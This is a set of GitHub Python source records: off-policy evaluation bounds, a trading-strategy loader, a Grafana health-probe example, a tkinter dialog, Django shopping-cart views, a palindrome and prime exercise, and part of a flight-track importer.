Takes a single pass over the Y input.\n Assumes cs is an array with constant value.\n \"\"\"\n n = len(Y)\n c = cs[0]\n Y2 = Y / cs\n term_1 = (n / c) ** -1\n brack_term_1 = Y2.sum() - (7*n*math.log(2/delta))/(3*(n-1))\n brack_inner_1 = n*(Y2**2).sum()\n brack_inner_2 = Y2.sum() ** 2\n brack_term_2 = math.sqrt(((2*math.log(2/delta))/(n-1)) *(brack_inner_1 - brack_inner_2))\n return term_1 * (brack_term_1 - brack_term_2)\n\ndef hcope_prediction(ds, e_policy, b_policy, n_post, c, delta, unscale=True):\n return_min, return_max = ds.traj_return.min(), ds.traj_return.max()\n ds['traj_value'] = ois_value_trajectory(ds, e_policy, b_policy)\n traj_values = ds.groupby('icustay_id')['traj_value'].first()\n n_pre = len(traj_values)\n cs = np.repeat(c, n_pre)\n Y = np.minimum(traj_values, cs)\n term_sample_mean = Y.sum()\n term2 = (7*c*math.log(2/delta))/(3*(n_post-1))\n term3 = math.log(2/delta)/n_post\n term4 = 2 / (n_pre*(n_pre-1))\n term5 = n_pre * (Y**2).sum() - term_sample_mean**2\n hcope_prediction = term_sample_mean - term2 - math.sqrt(term3*term4*term5)\n if unscale:\n result = unscale_result(hcope_prediction, original_range=(return_min, return_max))\n else:\n result = hcope_prediction\n return result\n\ndef am(dataset, e_policy, b_policy, delta, unscale=True):\n \"\"\"\n Implemented according to Anderson Inequality in Thomas, Teocharous and Ghavamzadeh (2015).\n \"\"\"\n assert 0 < delta < 1\n ds = dataset.copy()\n return_min, return_max = ds.traj_return.min(), ds.traj_return.max()\n ds['traj_return'] = (ds.traj_return + abs(return_min)) / (return_max + abs(return_min))\n assert ds['traj_return'].min() == 0.0\n assert 
ds['traj_return'].max() == 1.0\n    ds['traj_value'] = ois_value_trajectory(ds, e_policy, b_policy)\n    traj_values = ds.groupby('icustay_id')['traj_value'].first()\n    n = len(traj_values)\n    zs = sorted(traj_values)\n    maxz = max(zs)\n    sum_r = 0\n    for i, z in enumerate(zs[:-1]):\n        sum_r += (zs[i+1] - z) * min(1, i/n+math.sqrt((np.log(2/delta))/(2*n)))\n    am_result = maxz - sum_r\n    if unscale:\n        return unscale_result(am_result, original_range=(return_min, return_max))\n    else:\n        return am_result\n","repo_name":"florisdenhengst/guideline-informed-vent-rl","sub_path":"scripts/ope.py","file_name":"ope.py","file_ext":"py","file_size_in_byte":15406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74224344555","text":"import types  # 'imp' is deprecated and removed in Python 3.12; types.ModuleType replaces imp.new_module\nimport coza.errors\nfrom coza.api import ExchangeApi\n\n\ndef load_functions(code):\n    try:\n        alg = types.ModuleType('myalgo')\n        exec(code, alg.__dict__)\n        initialize = getattr(alg, 'initialize')\n        run_strategy = getattr(alg, 'run_strategy')\n        make_orders = getattr(alg, 'make_orders')\n\n        return (initialize, run_strategy, make_orders)\n    except AttributeError as e:\n        raise coza.errors.CozaException(str(e))\n    except Exception:\n        raise coza.errors.CozaException('Failed to load algorithm module')\n\n\ndef validation_exchange_currency(exchange, currency):\n    exchange = exchange.lower()\n    currency = currency.upper()\n    exchange_info = ExchangeApi.get_exchange_info()\n\n    if exchange in exchange_info.keys():\n        if currency in exchange_info[exchange]:\n            return True\n        raise coza.errors.CozaCurrencyException(currency)\n    raise coza.errors.CozaExchangeException(exchange)\n","repo_name":"Derek-tjhwang/CATS-LAB","sub_path":"coza/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"40339599779","text":"\"\"\"\nExample program for probing whether a data source is healthy.\n\nDocumentation: https://github.com/panodata/grafana-client/blob/main/examples/datasource-health-probe.rst\n\"\"\"\nimport json\nimport logging\nimport sys\nfrom optparse import OptionParser\n\nimport requests\nfrom verlib2 import Version\n\nfrom grafana_client import GrafanaApi\nfrom grafana_client.client import GrafanaClientError\nfrom grafana_client.knowledge import datasource_factory\nfrom grafana_client.model import DatasourceModel\nfrom grafana_client.util import setup_logging\n\nlogger = logging.getLogger(__name__)\n\n\nVERSION_7 = Version(\"7\")\nVERSION_8 = Version(\"8\")\nVERSION_9 = Version(\"9\")\n\n\ndef ensure_datasource(grafana: GrafanaApi, datasource: DatasourceModel):\n    \"\"\"\n    Ensure data source exists and is configured like desired.\n\n    Either create the data source, or update it. The data source name will be\n    used as data source identified.\n    \"\"\"\n\n    datasource_name = datasource.name\n\n    # Create data source.\n    datasource = datasource.asdict()\n    try:\n        logger.info(f\"Creating data source '{datasource_name}'\")\n        datasource = grafana.datasource.create_datasource(datasource)[\"datasource\"]\n    except GrafanaClientError as ex:\n        # When data source already exists, update data source.\n        if ex.status_code == 409:\n            logger.info(f\"Data source already exists: {ex.response}. 
Updating.\")\n datasource_existing = grafana.datasource.get_datasource_by_name(datasource_name=datasource_name)\n datasource = grafana.datasource.update_datasource(datasource_existing[\"id\"], datasource)[\"datasource\"]\n else:\n logger.error(\n f\"Failed to create or update data source '{datasource}'. \"\n f\"Reason: {ex.message}. Response: {ex.response}\"\n )\n raise\n return datasource\n\n\ndef health_probe(grafana: GrafanaApi, datasource: DatasourceModel):\n \"\"\"\n Add a data source dynamically, run a data source health check on it,\n and delete it again. Be graceful if the data source exists already.\n \"\"\"\n # Create data source.\n datasource = ensure_datasource(grafana, datasource)\n datasource_uid = datasource[\"uid\"]\n\n # Invoke the health check.\n health_info = grafana.datasource.health_inquiry(datasource_uid=datasource_uid)\n\n # Delete data source again.\n grafana.datasource.delete_datasource_by_uid(datasource_uid)\n\n return health_info.asdict_compact()\n\n\ndef prometheus_demo(grafana: GrafanaApi):\n datasource = DatasourceModel(\n name=\"probe-prometheus\", type=\"prometheus\", url=\"http://host.docker.internal:9090\", access=\"server\"\n )\n health_info = health_probe(grafana, datasource)\n return health_info\n\n\ndef run(grafana: GrafanaApi, grafana_version: Version = None):\n # When called without options, invoke the Prometheus demo.\n if len(sys.argv) == 1:\n if grafana_version < VERSION_8:\n raise NotImplementedError(\n f\"Data source health check subsystem on Grafana version {grafana_version} not supported for Prometheus\"\n )\n health_info = prometheus_demo(grafana)\n\n # When called with options,\n else:\n # parse them, and\n parser = OptionParser()\n parser.add_option(\"--type\", dest=\"type\", help=\"Data source type\")\n parser.add_option(\"--url\", dest=\"url\", help=\"Data source URL\")\n (options, args) = parser.parse_args()\n if (not options.type or not options.url) and not options.type == \"testdata\":\n parser.error(\"Options --type and --url required\")\n\n # Sanity checks\n if options.type == \"prometheus\" and grafana_version < VERSION_8:\n raise NotImplementedError(\n f\"Data source health check subsystem on Grafana version {grafana_version} not supported for Prometheus\"\n )\n\n # ... 
create a dynamic data source with the corresponding values.\n name = f\"probe-{options.type}\"\n datasource = DatasourceModel(name=name, type=options.type, url=options.url, access=\"server\")\n datasource = datasource_factory(datasource)\n\n # Invoke the health probe.\n health_info = health_probe(grafana, datasource)\n\n # Display the outcome and terminate program based on success state.\n print(json.dumps(health_info, indent=2))\n if not health_info[\"success\"]:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n setup_logging(level=logging.DEBUG)\n\n # Connect to Grafana instance and run health probe.\n grafana_client = GrafanaApi.from_env()\n\n try:\n grafana_client.connect()\n except requests.exceptions.ConnectionError:\n logger.exception(\"Connecting to Grafana failed\")\n raise SystemExit(1)\n\n grafana_version = Version(grafana_client.version)\n if grafana_version < VERSION_7:\n raise NotImplementedError(f\"Data source health check subsystem not ready for Grafana version {grafana_version}\")\n\n run(grafana_client, grafana_version=grafana_version)\n","repo_name":"panodata/grafana-client","sub_path":"examples/datasource-health-probe.py","file_name":"datasource-health-probe.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"73"} +{"seq_id":"10850829704","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nimport tkinter.font as font\nfrom LongRunningClass import LongRunningClass\n\nclass change_font_size_flow(LongRunningClass):\n\n def __init__(self, font):\n super().__init__()\n self.change_font_size_frame = None\n self.local_font = font\n self.force_exit_called = False\n self.completion_callback = None\n self.new_font_size = None\n pass\n\n def add_completion_callback(self, callback):\n self.completion_callback = callback\n\n def get_new_font_size(self):\n return self.new_font_size\n\n \n def create_font_size_change_window(self, current_font_size):\n self.change_font_size_frame = tk.Toplevel()\n self.change_font_size_frame.geometry(\"300x300\")\n self.change_font_size_frame.title(\"Change font size\")\n \n choices_frame = tk.Frame(self.change_font_size_frame)\n button_frame = tk.Frame(self.change_font_size_frame)\n info_label = tk.Label(choices_frame, text=\"Enter new font size:\", font=self.local_font)\n info_label.pack(side=tk.TOP, anchor=tk.W)\n \n new_font_size = tk.StringVar(choices_frame, \"\")\n if current_font_size != None:\n new_font_size.set(str(current_font_size))\n \n font_size_box = tk.Entry(choices_frame, textvariable = new_font_size, font=self.local_font)\n font_size_box.pack(side=tk.TOP, anchor=tk.W)\n \n \n ok_button = tk.Button(button_frame, text=\"Change font size\", command=lambda: self.make_font_size_change(info_label, new_font_size), font=self.local_font)\n cancel_button = tk.Button(button_frame, text=\"Cancel\", command=lambda: self.kill_change_font_size_frame(), font=self.local_font)\n \n ok_button.pack(side=tk.LEFT)\n cancel_button.pack(side=tk.LEFT)\n \n choices_frame.pack(side=tk.TOP)\n button_frame.pack(side=tk.TOP)\n \n self.change_font_size_frame.protocol(\"WM_DELETE_WINDOW\", lambda: self.kill_change_font_size_frame())\n return\n\n \n #####################################################################\n def make_font_size_change(self, info_label, new_font_size):\n new_font_size_int = -1\n try:\n new_font_size_int = int(new_font_size.get())\n except ValueError:\n pass\n \n if new_font_size_int != -1:\n self.new_font_size = new_font_size_int\n if 
self.completion_callback is not None:\n                self.completion_callback(self)\n            self.kill_change_font_size_frame()\n        else:\n            info_label.configure(text=\"Please enter a valid font size:\")\n        \n        \n        \n    #####################################################################\n    def kill_change_font_size_frame(self):\n        if self.change_font_size_frame is not None:\n            self.change_font_size_frame.destroy()\n            self.change_font_size_frame = None\n\n\n    def force_exit(self):\n        super().force_exit()\n        self.force_exit_called = True\n        \n\n","repo_name":"markaoconnell/QRienteering","sub_path":"OMeetWithMemberList/MeetSW/font_size_change_flow.py","file_name":"font_size_change_flow.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"70505651116","text":"from myadmin.models import Goods,Type,Users,Detail,Orders\nfrom django.shortcuts import render,redirect\nimport time\nfrom django.http import HttpResponse\nfrom django.core.paginator import Paginator\nfrom django.core.urlresolvers import reverse\n\ndef loadContext(request):\n\tcontext={}\n\tcontext['tlist'] = Type.objects.filter(pid=0)\n\treturn context\n\n# Home page\ndef index(request,tid=0):\n    context = loadContext(request)\n    # fetch the goods lists the page needs and put them into the context\n    context['alllist'] = Goods.objects.order_by('num').filter(state__in=[1,2])[0:4]\n    context['alllist1'] = Goods.objects.order_by('num').filter(state__in=[1,2])[5:9]\n    context['zuixinlist'] = Goods.objects.order_by('addtime').filter(state__in=[1,2])[0:4]\n    if tid == 0:\n        context['stulist'] = Goods.objects.filter(state__in=[1,2])[0:12]\n    else:\n        # fetch all subcategories under the current category\n        context['Type'] = Type.objects.filter(pid=tid)\n        # check whether a tid query parameter was passed\n        if request.GET.get('tid',None):\n            tid = request.GET['tid']\n            print(tid)\n            context['stulist'] = Goods.objects.filter(typeid=tid).filter(state=2)[0:11]\n            print(3)\n            # print(context['stulist'])\n        \n        a = Type.objects.filter()\n        \n        pidlist = set()\n        for i in a :\n            pidlist.add(i.pid)\n        print(pidlist)\n        tid = int(tid)\n        print(tid)\n        if(tid in pidlist) :\n            context['stulist'] = Goods.objects.filter(typeid__in=Type.objects.only('id').filter(path__contains=','+str(tid)+',')).filter(state=2)[0:11]\n            \n            print(2)\n        else:\n            # fetch all goods under the specified category\n            context['stulist'] = Goods.objects.filter(typeid=tid).filter(state=2)[0:11]\n            print(1)\n        # e.g. for tid=1 the SQL is: select * from myweb_goods where typeid in(select id from myweb_type where path like '%,1,%')\n    print(context)\n    return render(request,'myweb/index.html',context)\n\n# Goods list page\ndef list(request,tid=0):\n    context = loadContext(request)\n    # fetch the goods lists the page needs and put them into the context\n    if tid == 0:\n        context['stulist'] = Goods.objects.filter(state=2)\n    else:\n        # fetch all subcategories under the current category\n        context['Type'] = Type.objects.filter(pid=tid)\n        if request.GET.get('tid',None):\n            tid = request.GET['tid']\n            print(tid)\n            context['stulist'] = Goods.objects.filter(typeid=tid).filter(state=2)[0:11]\n            print(3)\n            # print(context['stulist'])\n        \n        a = Type.objects.filter()\n        \n        pidlist = set()\n        for i in a :\n            pidlist.add(i.pid)\n        print(pidlist)\n        tid = int(tid)\n        print(tid)\n        if(tid in pidlist) :\n            context['stulist'] = Goods.objects.filter(typeid__in=Type.objects.only('id').filter(path__contains=','+str(tid)+',')).filter(state=2)[0:11]\n            \n            print(2)\n        else:\n            # fetch all goods under the specified category\n            context['stulist'] = Goods.objects.filter(typeid=tid).filter(state=2)[0:11]\n            print(1)\n        # e.g. for tid=1 the SQL is: select * from myweb_goods where typeid in(select id from myweb_type where path like '%,1,%')\n    print(context)\n    return render(request,'myweb/list.html',context)\n\n
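# The category tree is resolved through Type.path, a materialized-path style column:\n# matching ','+str(tid)+',' against path pulls in every descendant category in one LIKE query.\n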
# Product detail page\ndef detail(request,gid):\n    context = loadContext(request)\n    ob = Goods.objects.get(id=gid)\n    ob.clicknum +=1\n    ob.save()\n    context['goods'] = ob\n    return render(request,'myweb/detail.html',context)\ndef gwc(request):\n\tif 'shoplist' in request.session:\n\t\tpass\n\telse:\n\t\trequest.session['shoplist']={}\n\tcontext = loadContext(request)\n\treturn render(request,'myweb/gwc.html',context)\ndef gwcadd(request,gid):\n\tgoods = Goods.objects.get(id = gid)\n\tshop = goods.toDict()\n\tshop['m'] = int(request.POST['m'])\n\tif 'shoplist' in request.session:\n\t\tshoplist = request.session['shoplist']\n\telse:\n\t\tshoplist = {}\n\tif gid in shoplist:\n\t\tshoplist[gid]['m']+=shop['m']\n\telse:\n\t\tshoplist[gid]=shop\n\trequest.session['shoplist']=shoplist\n\treturn redirect(reverse('gwc'))\ndef gwcclear(request):\n\tcontext = loadContext(request)\n\trequest.session['shoplist'] = {}\n\treturn render(request,\"myweb/gwc.html\",context)\ndef gwcdel(request,gid):\n\tshoplist = request.session['shoplist']\n\tdel shoplist[gid]\n\trequest.session['shoplist'] = shoplist\n\treturn redirect(reverse('gwc'))\ndef gwcchange(request):\n\tcontext = loadContext(request)\n\tshoplist = request.session['shoplist']\n\t# read the item id and quantity from the request\n\tshopid = request.GET['sid']\n\tnum = int(request.GET['m'])\n\tstore = Goods.objects.get(id = shopid).store\n\tprint(shopid)\n\tprint(num)\n\tif num<1:\n\t\tnum = 1\n\telse:\n\t\tif num >= store:\n\t\t\tcontext['info']='没有库存了哦,亲!'\n\t\t\tprint(context['info'])\n\t\telse:\n\t\t\tnum+=1\n\n\tshoplist[shopid]['m'] = num # update the item quantity\n\trequest.session['shoplist'] = shoplist\n\treturn render(request,\"myweb/gwc.html\",context)\ndef gwcchange1(request):\n\tcontext = loadContext(request)\n\tshoplist = request.session['shoplist']\n\t# read the item id and quantity from the request\n\tshopid = request.GET['sid']\n\tnum = int(request.GET['m'])\n\tprint(shopid)\n\tprint(num)\n\tif num<=1:\n\t\tnum = 1\n\telse:\n\t\tnum-=1\n\tshoplist[shopid]['m'] = num # update the item quantity\n\trequest.session['shoplist'] = shoplist\n\treturn render(request,\"myweb/gwc.html\",context)\ndef dingdan(request):\n\tif 'id' not in request.POST:\n\t\treturn HttpResponse('选商品啊大哥!')\n\ttotal = 0\t\n\tprint(request.POST)\n\tval = request.POST.getlist('id')\n\tprint(val)\n\tgoodslist = {}\n\tshoplist = request.session['shoplist']\n\tfor id in val:\n\t# compute the order total\n\t\ttotal += shoplist[id]['price']*shoplist[id]['m'] \n\t\t# accumulate the total\n\t\t\t# fetch the selected goods record\n\t\tob = Goods.objects.get(id = id)\n\t\tob.m = shoplist[id]['m'] \n\t\tgoodslist[id]=ob\n\tprint(goodslist)\t\n\t# print(val)\t\n\t# print(shoplist)\t\n\tprint(ob.m)\n\tname = request.session['user']['name']\n\tusers = Users.objects.get(name= name)\n\tcontext = loadContext(request)\n\tcontext['users']=users\n\tcontext['goodslist']=goodslist\n\trequest.session['shoplist'] = shoplist\n\tcontext['total']=total\n\t# print(context)\n\treturn render(request,\"myweb/dingdan.html\",context)\ndef dingdancf(request):\n\tif request.POST['linkman']=='':\n\t\treturn HttpResponse('写联系人!!')\n\tif request.POST['phone']=='':\n\t\treturn HttpResponse('写电话!!')\n\tif request.POST['code']=='':\n\t\treturn HttpResponse('写邮编!')\n\tif request.POST['address']=='':\n\t\treturn HttpResponse('写地址!')\n\tuser = {}\n\tuser['linkman'] = request.POST['linkman']\n\tuser['address'] = request.POST['address']\n\tuser['code'] = request.POST['code']\n\tuser['phone'] = request.POST['phone']\n\tcontext = loadContext(request)\n\tcontext['user']=user\n\ttotal = 0\t\n\tval = request.POST.getlist('sid')\n\tprint(val)\n\tgoodslist = {}\n\tshoplist = request.session['shoplist']\n
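\t# only the items ticked in the cart form (their ids arrive via the POST 'sid' list) are ordered\n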
\tfor id in val:\n\t# compute the order total\n\t\ttotal += shoplist[id]['price']*shoplist[id]['m'] \n\t\t# accumulate the total\n\t\t\t# fetch the selected goods record\n\t\tob = Goods.objects.get(id = id)\n\t\tob.m = shoplist[id]['m']\n\t\tob.save() \n\t\tprint(ob)\n\t\tgoodslist[id]=ob\n\tprint(goodslist)\n\trequest.session['shoplist'] = shoplist\n\tcontext['goodslist']=goodslist\n\tcontext['total']=total\n\treturn render(request,\"myweb/dingdancf.html\",context)\ndef dingdans(request):\n\t# user = Users.objects.get(name= request.session['name'])\n\t# print(request.session['shoplist'])\n\tshoplist = request.session['shoplist']\n\tprint(shoplist)\n\tval = request.POST.getlist('sid')\n\tprint(val)\n\t# update the user's contact information\n\tuser = Users.objects.get(name = request.session['user']['name'])\n\tuser.address = request.POST['address']\n\tuser.code = request.POST['code']\n\tuser.phone = request.POST['phone']\n\tuser.save()\n\ttotal = 0\n\tfor id in val:\n\t\ttotal += shoplist[id]['price']*shoplist[id]['m']\n\t\t# create the order record\n\torder = Orders()\n\torder.uid = user.id\n\torder.linkman = request.POST['linkman']\n\torder.address = request.POST['address']\n\torder.code = request.POST['code']\n\torder.phone = request.POST['phone']\n\torder.addtime = time.time()\n\torder.total = total\n\torder.status = 0\n\torder.save()\n\n\t# create the order detail rows and update sales count / stock\n\t\n\tfor id in val:\n\t\tdetail = Detail()\n\t\tdetail.orderid = order.id\n\t\tdetail.goodsid = id\n\t\tdetail.price = shoplist[id]['price']\n\t\tdetail.name = shoplist[id]['goods']\n\t\tdetail.num = shoplist[id]['m']\n\t\tdetail.save()\n\t\tm = shoplist[id]['m']\n\t\tgood = Goods.objects.get(id = id)\n\t\tgood.num += shoplist[id]['m']\n\t\tgood.store -= shoplist[id]['m']\n\t\tgood.save()\n\t\tdel shoplist[id] \n\t\tprint(m)\n\t\tprint(good.num)\n\t\tprint(good.store)\n\t\t\n\n\trequest.session['shoplist'] = shoplist\n\tcontext = loadContext(request)\n\tcontext['info'] = \"订单确认成功!\"\n\treturn render(request,\"myweb/info.html\",context)","repo_name":"july0426/xiaomi","sub_path":"myobject/myweb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"38116454655","text":"def show_menu():\n    print(\"Enter 0 to check a palindrome\")\n    print(\"Enter 1 to check whether a number is prime\")\n    print(\"Enter 99 to Exit\")\ndef is_prime(num):\n    f=1\n    if num < 2:\n        print('not prime')\n    else:\n        for count in range(2,num):\n            if(num%count==0):\n                f=0\n        if f == 1:\n            print('is prime')\n        else:\n            print('not prime')\n\ndef is_palindrome(word):\n    reversed_word = word[::-1]\n    f=1\n    for x in range(0,len(word)-1):\n        if reversed_word[x]!=word[x]:\n            f=0\n    if f==1:\n        print('is palindrome')\n    else:\n        print('not palindrome')\nn=2\nwhile n!=99:\n    show_menu()\n    n = int(input())\n    if n==0:\n        word=input('Enter the word')\n        is_palindrome(word)\n    elif n==1:\n        num = int(input('Enter the number'))\n        is_prime(num)\n    elif n!=99:\n        print('enter a correct number')\n\n\n\n\n","repo_name":"abdulraahmansaleh/prime-plandrom_by_Python","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"32827788142","text":"\"\"\"\r\nImport a flight track into a spatial database. 
Accepted file types are GPX, Garmin GDB, KML, XLSX, and CSV (CSVs may come from GSAT, Spyder Tracks, AFF, Temsco, or Foreflight files).\r\n\r\nUsage:\r\n    import_track.py <connection_txt> <track_path> [--seg_time_diff=<seg_time_diff>] [--min_point_distance=<min_point_distance>] [--registration=<registration>] [--submission_method=<submission_method>] [--ssl_cert_path=<ssl_cert_path>] [--operator_code=<operator_code>] [--aircraft_type=<aircraft_type>] [--force_import] [--email_credentials_txt=<email_credentials_txt>] [--log_file=<log_file>]\r\n    import_track.py <connection_txt> --show_operators\r\n\r\nExamples:\r\n    python import_track.py connection_info.txt \"T:/ResMgmt/Users/sam_h/proj/overflights/sample_data/2019.03.08_N709M_16N_4_edited.gpx\" -r N709M -o NPS\r\n    python import_track.py connection_info.txt \"T:/ResMgmt/Users/sam_h/proj/overflights/sample_data/2019.03.08_N709M_16N_4_edited.gpx\" --registration N709M --operator_code NPS\r\n\r\nRequired parameters:\r\n    connection_txt            Path of a text file containing information to connect to the DB. Each line\r\n                              in the text file must be in the form 'variable_name; variable_value.'\r\n                              Required variables: username, password, ip_address, port, db_name.\r\n    track_path                Path of the track file to import.\r\n\r\nOptions:\r\n    -h, --help                      Show this screen.\r\n    --seg_time_diff=<seg_time_diff>  Minimum time in minutes between two points in a track file indicating the start of\r\n                                    a new track segment [default: 15]\r\n    -d, --min_point_distance=<min_point_distance>  Minimum distance in meters between consecutive track points to determine unique\r\n                                    vertices. Any points that are less than this distance from the preceding point and\r\n                                    have the same timestamp will be removed. [default: 200]\r\n    -r, --registration=<registration>  Tail (N-) number of the aircraft\r\n    -o, --operator_code=<operator_code>  Three-digit code for the operator of the aircraft. All administrative flights\r\n                                    should be submitted with the code NPS\r\n    -c, --ssl_cert_path=<ssl_cert_path>  Path to an SSL .crt or .pem file for sending an HTTP request to registry.faa.gov to\r\n                                    retrieve info about the aircraft\r\n    -m, --submission_method=<submission_method>  Method used for submission. This parameter should not be given when manually\r\n                                    importing tracks. Its purpose is to distinguish manual vs. 
automated submissions.\r\n    -t, --aircraft_type=<aircraft_type>  The model name of the aircraft\r\n    -f, --force_import              If specified, import all data even if there are matching flight segments\r\n                                    in the database already\r\n    --email_credentials_txt=<email_credentials_txt>  Path of a text file containing the email username and password\r\n                                    for sending error notification emails\r\n    --log_file=<log_file>           Path of a log file to attach to error notification emails\r\n    -s, --show_operators            Print all available operator names and codes to the console\r\n\"\"\"\r\n\r\nimport sys, os\r\nimport re\r\nimport pytz\r\nimport math\r\nimport random\r\nimport string\r\nimport pyproj\r\nimport shutil\r\nimport warnings\r\nimport subprocess\r\nimport smtplib\r\nimport chardet.universaldetector\r\nimport docopt\r\nimport requests\r\nimport bs4\r\nimport numpy as np\r\nimport pandas as pd\r\n#import gdal # this import is unused, but for some reason geopandas (shapely, actually) won't load unless gdal is imported first\r\nimport geopandas as gpd\r\nfrom datetime import datetime, timedelta\r\nfrom geoalchemy2 import Geometry, WKTElement\r\nfrom shapely.geometry import LineString as shapely_LineString, Point as shapely_Point\r\n\r\nimport db_utils\r\nimport update_aircraft_info as ainfo\r\nimport process_emails\r\nimport kml_parser\r\nfrom utils import get_cl_args\r\n\r\n\r\n# Patterns of column names for different csv sources\r\nCSV_INPUT_COLUMNS = [\r\n    ['aff', ['Registration', 'Longitude', 'Latitude', 'Speed (kts)', 'Heading (True)', 'Altitude (FT MSL)', 'Fix', 'PDOP', 'HDOP', 'posnAcquiredUTC', 'posnAcquiredUTC -8', 'usageType', 'source', 'Latency (Sec)']],\r\n    ['gsat', ['Asset', 'IMEI/Unit #/Device ID', 'Device', 'Positions', 'Events', 'Messages', 'Alerts']],\r\n    ['gsat', ['Events', 'Date', 'Address', 'Lat/Lng', 'Speed', 'Heading', 'Altitude', 'Via']],\r\n    ['spy', ['Aircraft', 'Registration', 'Track', 'Point', 'DateTime(UTC)', 'DateTime(Local)', 'Latitude', 'Latitude(degrees)', 'Latitude(minutes)', 'Latitude(seconds)', 'Latitude(decimal)', 'Longitude', 'Longitude(degrees)', 'Longitude(minutes)', 'Longitude(seconds)', 'Longitude(decimal)', 'Altitude(Feet)', 'Altitude(ft)', 'Speed(knots)', 'Bearing', 'PointType', 'Description']],\r\n    ['tms', ['Serial No.', 'UTC', 'Latitude', 'HemNS', 'Longititude', 'HemEW', 'Knots', 'Heading', 'Altitude (m)', 'HDOP', 'New Conn', 'Entered', 'Event', 'ESN', 'Latitude (DDMM.MMMM)', 'Longititude (DDMM.MMMM)',\r\n            'Heading (True)', 'Server Time (PDT)']],\r\n    ['foreflight', ['Pilot', 'Tail Number', 'Derived Origin', 'Start Latitude', 'Start Longitude', 'Derived Destination', 'End Latitude', 'End Longitude', 'Start Time', 'End Time', 'Total Duration', 'Total Distance', 'Initial Attitude Source', 'Device Model', 'Device Model Detailed', 'iOS Version', 'Battery Level', 'Battery State', 'GPS Source', 'Maximum Vertical Error', 'Minimum Vertical Error', 'Average Vertical Error', 'Maximum Horizontal Error', 'Minimum Horizontal Error', 'Average Horizontal Error', 'Imported From', 'Route Waypoints']]\r\n]\r\n\r\nCSV_OUTPUT_COLUMNS = {'aff': {'Registration': 'registration',\r\n                              'Longitude': 'longitude',\r\n                              'Latitude': 'latitude',\r\n                              'Speed (kts)': 'knots',\r\n                              'Heading (True)': 'heading',\r\n                              'Altitude (FT MSL)': 'altitude_ft',\r\n                              'posnAcquiredUTC': 'utc_datetime',\r\n                              'posnAcquiredUTC -8': 'ak_datetime',\r\n                              'posnAcquiredUTC (8)':'ak_datetime',\r\n                              'posnAcquiredUTC 0': 'ak_datetime',\r\n                              'DateTime Local': 'ak_datetime'\r\n                              },\r\n                      'gsat': { },\r\n                      'spy': {'Registration': 'registration',\r\n                              'Aircraft': 'registration',\r\n                              'DateTime(UTC)': 'utc_datetime',\r\n                              'DateTime(Local)': 'ak_datetime',\r\n                              'Latitude(decimal)': 'latitude',\r\n                              
'Longitude(decimal)': 'longitude',\r\n 'Altitude(Feet)': 'altitude_ft',\r\n 'Altitude(ft)': 'altitude_ft',\r\n 'Bearing': 'heading'\r\n },\r\n 'tms': {'UTC': 'utc_datetime',\r\n 'Latitude': 'latitude',\r\n 'Longititude': 'longitude',\r\n 'Longitude (DDMM.MMMM)': 'longitude',\r\n 'Longititude (DDMM.MMMM)': 'longitude',\r\n 'Latitude (DDMM.MMMM)': 'latitude',\r\n 'Knots': 'knots',\r\n 'Heading': 'heading',\r\n 'Heading (True)': 'heading'\r\n }\r\n }\r\nERROR_EMAIL_ADDRESSES = ['samuel_hooper@nps.gov']\r\n\r\n# Columns to use to verify that the file was read correctly\r\nVALIDATION_COLUMNS = pd.Series(['geometry', 'utc_datetime', 'altitude_ft', 'longitude', 'latitude', 'x_albers', 'y_albers', 'diff_m', 'diff_seconds', 'm_per_sec', 'knots', 'previous_lat', 'previous_lon', 'heading'])\r\n\r\nARCHIVE_DIR = r'\\\\inpdenaterm01\\overflights\\imported_files\\tracks'\r\n\r\nREGISTRATION_REGEX = r'(?i)N\\d{1,5}[A-Z]{0,2}'\r\n\r\nFEET_PER_METER = 3.2808399\r\nM_PER_S_TO_KNOTS = 1.94384\r\n\r\ndef calc_bearing(lat1, lon1, lat2, lon2):\r\n '''\r\n Calculate bearing from two lat/lon coordinates. Logic from https://gist.github.com/jeromer/2005586\r\n\r\n :return: integer compass bearing (between 0-360°)\r\n '''\r\n lat1_rad = math.radians(lat1)\r\n lat2_rad = math.radians(lat2)\r\n\r\n longitude_diff = math.radians(lon2 - lon1)\r\n\r\n x = math.sin(longitude_diff) * math.cos(lat2_rad)\r\n y = math.cos(lat1_rad) * math.sin(lat2_rad) - \\\r\n (math.sin(lat1_rad) * math.cos(lat2_rad) * math.cos(longitude_diff))\r\n\r\n initial_bearing = math.degrees(math.atan2(x, y))\r\n\r\n # math.atan2 returns values from -180° to + 180°, so convert to 0-360\r\n compass_bearing = (initial_bearing + 360) % 360\r\n\r\n return compass_bearing\r\n\r\n\r\ndef calc_distance_to_last_pt(gdf):\r\n\r\n #in_proj = pyproj.Proj('epsg:4326')\r\n #out_proj = pyproj.Proj('epsg:3338') # Alaska Albers Equal Area, which is pretty good at preserving distances\r\n transformer = pyproj.Transformer.from_crs('epsg:4326', 'epsg:3338')\r\n # for some reason you specify .transform() with y, x but it returns x, y\r\n gdf['x_albers'], gdf['y_albers'] = transformer.transform(gdf.latitude.values, gdf.longitude.values)#pyproj.transform(in_proj, out_proj, gdf.longitude.values, gdf.latitude.values)\r\n distance = (gdf.x_albers.diff()**2 + gdf.y_albers.diff()**2)**0.5 # distance between 2 points\r\n\r\n return distance\r\n\r\n\r\ndef read_gpx(path, seg_time_diff=15):\r\n\r\n gdf = gpd.read_file(path, layer='track_points')#, geometry='geometry')\r\n\r\n # Convert to datetime. It's almost in the right format to be read automatically except there's a T instead of a\r\n # space between the date and the time\r\n gdf['utc_datetime'] = pd.to_datetime(gdf.time)\r\n gdf = 